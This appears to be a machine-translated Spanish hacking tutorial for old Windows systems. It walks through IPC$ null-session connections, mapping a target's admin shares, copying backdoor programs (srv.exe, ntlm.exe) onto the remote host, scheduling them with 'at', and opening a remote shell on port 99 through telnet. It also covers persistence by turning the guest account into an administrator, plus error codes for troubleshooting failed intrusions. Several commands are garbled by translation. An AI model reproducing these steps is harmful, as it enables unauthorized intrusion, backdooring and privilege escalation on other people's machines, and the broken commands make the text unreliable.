Solicitando el comando net use
1) Establezca una conexión vacía:
net use \\IP\ipc$ "" /user: "" (Asegúrese de tener en cuenta: esta línea de comando contiene 3 espacios)
2) Establecer una conexión no vacía:
net use \\IP\ipc$ "contraseña" /usuario: "nombre de usuario" (también tiene 3 espacios)
3) Asignación predeterminada *** share:
net use z: \\IP\c$ "contraseña" /usuario: "nombre de usuario" (puede asignar la unidad c de la otra parte a la suya propia z, y así sucesivamente para otros discos)
Si se ha establecido ipc$ con el destino, puede acceder directamente a él con la letra de unidad IP $. El comando específico es net use z: \\IP. \c$
4) Eliminar una conexión ipc$
net use \\IP\ipc$ /del
5) Eliminar ***mapeo compartido
net use c: /del elimina la unidad c asignada, y así sucesivamente para otras unidades
net use * /del elimina todo, aparecerá un mensaje solicitando que presione y para confirmar
3 Ver los ** *Recursos compartidos del host remoto (pero no puedes ver los recursos compartidos predeterminados)
net view \\IP
4 Ver los recursos compartidos recursos del host local (puede ver los recursos compartidos locales predeterminados) ***share)
net share
5 Obtenga la lista de nombres de usuario del host remoto
nbtstat -A IP
6 Obtener la lista de usuarios del host local
net user
7 Ver la hora actual del host remoto
net time \\IP
8 Mostrar el host local Servicio actual
net start
9 Iniciar/detener el servicio local
nombre del servicio net start/y
nombre del servicio net stop/y
10 Mapeo de uso compartido remoto:
net use z: \\IP\baby
Este comando compartirá el recurso compartido remoto llamado baby **los recursos compartidos están asignados a la unidad z
11 Eliminar ***asignación compartida
net use c:/del Elimine la unidad c asignada, y así sucesivamente para otras unidades
net use * /del /yEliminar todo
12 Copie los archivos al host remoto
copiar \ ruta\srv.exe \\IP\***nombre del directorio compartido, como por ejemplo:
copiar ccbirds.exe \\*.*.*.*\c copiará los archivos en el directorio actual a la unidad c de la otra parte
13 Agregue tareas programadas de forma remota
en el nombre del programa \\ip time, como por ejemplo:
en \\127.0.0.0 11: 00 love.exe
Nota: intente utilizar el formato de 24 horas; en el sistema no es necesario agregar una ruta a la ruta de búsqueda predeterminada (como system32/); de lo contrario, se debe agregar la ruta completa. añadido
14 Active telnet en el host remoto
Aquí se utiliza un pequeño programa: opentelnet.exe. Todos los principales sitios de descarga lo tienen y deben cumplir cuatro requisitos: <. /p>
1) El objetivo ha habilitado el uso compartido de ipc$***
2) Debe tener una cuenta y una contraseña de administrador
3) Si el objetivo abre RemoteRegistry servicio, el usuario será autenticado por ntlm
4) Válido para WIN2K/XP, NT no ha sido probado
Formato de comando: O
penTelnet.exe \\ cuenta de servidor psw puerto de modo de autenticación NTLM
El ejemplo es el siguiente: c:\gt OpenTelnet.exe \\*.*.*.* administrador "" 1 90
15 Activar usuario/unirse al grupo de administradores
1 cuenta net uesr /activa: sí
2 cuentas netas de administradores de grupo local /agregar
16 Apagar el host remoto telnet
también requiere un pequeño programa: ResumeTelnet.exe
Formato de comando: ResumeTelnet.exe \\server account psw
El ejemplo es el siguiente: c:\ gt; ResumeTelnet.exe \\*.*.*.* administrador ""
17 Eliminar una conexión ipc$ establecida
net use \\IP\ipc$ / del
Nueve modos de intrusión clásicos
Este modo de intrusión es tan clásico que la mayoría de los tutoriales de IPC lo han introducido, así que lo cité aquí. Me gustaría agradecer al autor original (¡yo! no lo sé) ¿Qué senior?)
1. C:\gt;net use \\127.0.0.1\IPC$ "" /user: "admintitrators"
Este es usando "Streamer" El nombre de usuario escaneado es administradores y la contraseña es una dirección IP "vacía" (¿contraseña vacía? Vaya, tienes mucha suerte, si planeas atacar, puedes usar dicho comando para establecer una conexión con 127.0). .0.1, porque la contraseña está "vacía", por lo que no es necesario ingresar la primera comilla. El nombre de usuario está entre las siguientes comillas dobles. Ingrese administradores y el comando se completará con éxito.
Antes de copiar, asegúrese de utilizar el comando net view \\IP para verificar el estado de uso compartido de la otra parte
2. 0.1 \admin$
Primera copia de srv.exe, que está disponible en el directorio de herramientas del transmisor ($ aquí se refiere al c:\winnt\system32\ del usuario administrador. También puede usar c$, d $, significa unidad C y unidad D, depende de dónde quieras copiar).
3. C:\gt;net time \\127.0.0.1
Verifique la hora y descubra que la hora actual de 127.0.0.1 es 2002/3/19 11:00. am El comando se completó con éxito.
4. C:\gt;at \\127.0.0.1 11:05 srv.exe
Utilice el comando at para iniciar srv.exe (el tiempo establecido aquí es mayor que la hora del host Date prisa, de lo contrario, ¿cómo puedes iniciarlo? Jaja)
5. Si la hora actual de 127.0.0.1 son las 11:05 am del 19/3/2002, prepárese para iniciar el siguiente comando.
6. C:\gt;telnet 127.0.0.1 99
Aquí se utilizará el comando Telnet. Tenga en cuenta que el puerto es 99. El puerto Telnet predeterminado es 23, pero usamos SRV para crear un Shell de 99 puertos en la computadora de la otra parte.
Aunque podemos utilizar Telnet, SRV es de un solo uso y debe activarse nuevamente la próxima vez que inicie sesión. ¡Así que vamos a construir un servicio Telnet! Esto requiere el uso de ntlm
7.C:\gt;copy ntlm.exe \\127.0.0.1\admin$
Utilice el comando Copiar para cargar ntlm.exe al host (ntlm.exe también se encuentra en el directorio Herramientas de "Streamer").
8. C:\WINNT\system32gt;ntlm
Ingrese ntlm para iniciar (C:\WINNT\system32gt; aquí se refiere a la otra computadora. La ejecución de ntlm realmente permite que este programa se ejecute en el ordenador de la otra parte). Cuando aparece "DONE", significa que ha comenzado normalmente. Luego utilice "net start telnet" para iniciar el servicio Telnet.
9. Telnet 127.0.0.1, luego ingrese el nombre de usuario y la contraseña para ingresar a la otra parte. ¡La operación es tan simple como operar en DOS! (Entonces, ¿qué quieres hacer? Simplemente haz lo que quieras, jaja)
Por si acaso, agregaremos la activación de invitados al grupo de administración
10. ;net user guest /active: sí
Activar el usuario invitado de la otra parte
11.\gt;net user guest 1234
Activar el usuario invitado Cambie la contraseña a 1234, o la contraseña que desee establecer
12. C:\gt;net localgroup Administrators guest /add
Cambiar invitado a administrador^_^ (si es así). la contraseña del administrador se cambia pero la cuenta de invitado permanece sin cambios, podemos usar invitado para acceder a esta computadora nuevamente la próxima vez)
Además, también puede analizar el motivo según el número de error devuelto:
Error nº 5, Acceso denegado: Es muy probable que el usuario que estás utilizando no tenga privilegios de administrador primero;
Error nº51, Windows no puede encontrar la red. ruta: hay un problema con la red;
Error número 53, no se puede encontrar la ruta de la red: la dirección IP es incorrecta; el destino no está encendido; el servicio lanmanserver de destino no está iniciado; el objetivo tiene un firewall (filtrado de puertos);
Error número 67, no se puede encontrar el nombre de la red: su servicio lanmanworkstation no se ha iniciado o el objetivo ha eliminado ipc$;
Número de error 1219, las credenciales proporcionadas entran en conflicto con el conjunto de credenciales existente: ya ha establecido un ipc$ con la otra parte, elimínelo e inténtelo de nuevo.
Error número 1326, nombre de usuario desconocido o contraseña incorrecta: el la razón es obvia;
Error número 1792, al intentar iniciar sesión, pero el servicio de inicio de sesión de red no se inició: el servicio NetLogon de destino no se inició;
Error número 2242, el nombre de este usuario la contraseña ha caducado: el objetivo tiene una política de cuenta que fuerza cambios periódicos de contraseña